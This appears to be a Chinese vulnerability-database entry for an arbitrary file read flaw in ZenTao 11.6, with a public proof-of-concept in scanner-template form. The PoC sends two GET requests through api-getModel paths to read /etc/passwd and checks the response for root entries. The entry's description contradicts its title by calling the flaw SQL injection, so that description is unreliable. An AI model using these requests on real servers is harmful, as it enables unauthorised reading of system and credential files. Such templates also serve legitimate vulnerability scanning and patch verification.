zentao-api-getmodel-api-getmethod-filepath-fileread: 禅道 11.6 Api getModel api getMethod filePath 任意文件读取漏洞

日期: 2025-09-01 | 影响软件: 禅道 | POC: 已公开

漏洞描述

禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入 icon_hash="53755730"

PoC代码[已公开]

id: zentao-api-getmodel-api-getmethod-filepath-fileread

info:
  name: 禅道 11.6 Api getModel api getMethod filePath 任意文件读取漏洞
  author: daffainfo
  severity: critical
  description: 禅道 11.6 版本中对用户接口调用权限过滤不完善,导致调用接口执行SQL语句导致SQL注入 icon_hash="53755730"
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/CMS%E6%BC%8F%E6%B4%9E/%E7%A6%85%E9%81%93%2011.6%20api-getModel-api-getMethod-filePath%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

rules:
    Linux0:
        request:
            method: GET
            path: /api-getModel-file-parseCSV-fileName=/etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
    Linux1:
        request:
            method: GET
            path: /api-getModel-api-getMethod-filePath=/etc/passwd/1
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: Linux0() || Linux1()

相关漏洞推荐